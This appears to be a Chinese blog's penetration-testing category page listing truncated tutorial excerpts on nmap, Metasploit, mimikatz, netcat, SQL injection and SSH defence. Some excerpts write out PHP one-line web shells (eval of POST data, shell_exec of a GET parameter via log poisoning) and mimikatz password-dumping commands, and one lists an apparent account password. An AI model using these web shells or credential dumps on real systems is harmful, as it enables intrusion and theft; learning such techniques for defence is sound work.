随笔分类 -  渗透测试

摘要:总结:主机发现-sn 防止NMAP端口扫描-SP TCP 半连接扫描,默认是通过80端口来发现主机的-SA ACK ping 扫描-SU UDP ping 扫描 不好用端口扫描-p 指定端口或者端口范围,默认是1024内的端口-p21-sT TCP全连接扫描 -sS TCP半开扫描,不建立全连接,只 阅读全文
posted @ 2018-02-02 16:23 Khazix 阅读(661) 评论(0) 推荐(1) 编辑
摘要:wget http://www.kegel.com/wine/winetricks chmod +x winetricks ./winetricks 钩选msxml3就可以了。 _________________Wine与中文显示补丁的安装 Wine注册表设置 wine msiexec.exe /i 阅读全文
posted @ 2018-01-23 13:30 Khazix 阅读(588) 评论(0) 推荐(0) 编辑
摘要:github地址:https://github.com/demonxian3/LittleScript/blob/master/SSHprotecter.sh 使用方法: 1.给足脚本权限,chmod 755 SSHprotecter.sh 2.使用crontab周期执行,如果是每隔10分钟执行一次 阅读全文
posted @ 2018-01-22 23:01 Khazix 阅读(840) 评论(0) 推荐(1) 编辑
摘要:1.导入私钥,将私钥文件放到当前登陆用户目录下的.ssh目录下 2.指定私钥登陆,ssh -i .ssh/ssh_rsa root@target.com 如果出现了下面这种情况 这是因为私钥文件权限太高了,比较不安全,所以被阻止,需要将ssh_rsa的权限设置低一些比如 0400 chmod 040 阅读全文
posted @ 2018-01-22 22:48 Khazix 阅读(2565) 评论(0) 推荐(0) 编辑
摘要:show exploit show payload msf使用数据库加快搜索,不然每次都等半天 service postgresql startmsfdb reinitmsf > db_rebuild_cache 需要等待几分钟 查询漏洞对应的模块 use exploit/windows/smb/m 阅读全文
posted @ 2018-01-18 09:24 Khazix 阅读(666) 评论(0) 推荐(0) 编辑
摘要:webacoo -g 生成一句话 -o 输出文件 -r 不混淆代码 -t 连接模式 -u 制定URL 生成一句话 webacoo -g -o a.php 连接一句话 webacoo -t -u http://url/a.php 阅读全文
posted @ 2018-01-11 14:31 Khazix 阅读(401) 评论(0) 推荐(0) 编辑
摘要:命令执行 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令 拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 利用条件 1.应用调 阅读全文
posted @ 2018-01-11 09:24 Khazix 阅读(2261) 评论(0) 推荐(0) 编辑
摘要:mimikatz用法 privilege::debug 进入debug模式 sekurlsa::logonPasswords 查看所有用户密码 sekurlsa::wdigest 读取当前登录用户 process::list 查看进程 process::suspend /pid:5576 暂停557 阅读全文
posted @ 2018-01-09 14:01 Khazix 阅读(758) 评论(0) 推荐(0) 编辑
摘要:今天无意间看到了许多奇怪的进程,占用CPU还挺多的, 于是 lastb 查看登录失败日志,发现都被写爆了,看来很有可能被爆破成功进去了 攻击者的地址是同网段的,很有可能云服务器的邻居先被攻下,然后挂着爆破ssh脚本来24小时破解 看到这个马上首先做的就是禁了IP iptables -A INPUT 阅读全文
posted @ 2018-01-08 18:02 Khazix 阅读(1540) 评论(0) 推荐(0) 编辑
摘要:扫描端口 nc -z -v -n 192.168.10.100 20-200 连接服务 nc -v 192.168.10.100 21 开启服务 nc -l -p 444 聊天 一台开启444端口:nc -l -p 444 另一台连接444端口:nc -v 192.168.10.100 444 然后 阅读全文
posted @ 2018-01-08 13:45 Khazix 阅读(651) 评论(0) 推荐(1) 编辑
摘要:<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat 阅读全文
posted @ 2018-01-08 09:44 Khazix 阅读(324) 评论(0) 推荐(0) 编辑
摘要:at 8:00 /interactive cmd.exe 以system用户打开cmd.exe taskkill explorer taskadd explorer 以system用户打开桌面 sc create syscmd binpath = "cmd /k start" type = own 阅读全文
posted @ 2018-01-04 09:09 Khazix 阅读(345) 评论(0) 推荐(0) 编辑
摘要:下载apache+mysql+php 的服务组件 phpstudy phpstudy 下载地址 https://www.baidu.com/link?url=EN5Br6PK-Gboaf905Jjt0x310ikra2SPzGtEB5a_wsoLmMorPM9jr51CLRUdACZ4AkuBUlB 阅读全文
posted @ 2017-12-28 16:05 Khazix 阅读(660) 评论(0) 推荐(0) 编辑
摘要:http://www.cr173.com/soft/5986.html www.shodan.com http://24mail.chacuo.io/ demonxian3 11223344a http://27.219.33.46:82/Login.htm http://www.freebuf.c 阅读全文
posted @ 2017-12-26 15:47 Khazix 阅读(555) 评论(0) 推荐(0) 编辑
摘要:MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMA view_name 名称。 列 阅读全文
posted @ 2017-12-21 21:06 Khazix 阅读(1024) 评论(0) 推荐(0) 编辑
摘要:转载一篇大神的文章 大家可能注意到了,网页上有些图片的src或css背景图片的url后面跟了一大串字符,比如: 什么是DATA URI Scheme呢? 其实就是形如data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAOQWRvYmUAZMAA=的资源链接 阅读全文
posted @ 2017-11-23 10:01 Khazix 阅读(1368) 评论(0) 推荐(0) 编辑
摘要:查看所有数据库名 查看当前数据所有表 查询所有表的数据结构(最牛逼的) 其他操作符合sql标准: 注意:字符串需要使用单引号包围,如果输入的名称含有空格,那么可以使用双引号来标明。 其他操作: 以第一个字段进行排序 查询所有数据username字段的长度 创建一个自动增长ID的表 create ta 阅读全文
posted @ 2017-11-18 11:11 Khazix 阅读(571) 评论(0) 推荐(0) 编辑
摘要:前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。 于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效, 无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ? 整站是独立服务器,就一个站,旁注也没办法。难到要C段?好 阅读全文
posted @ 2017-11-07 10:46 Khazix 阅读(1429) 评论(0) 推荐(1) 编辑

点击右上角即可分享
微信分享提示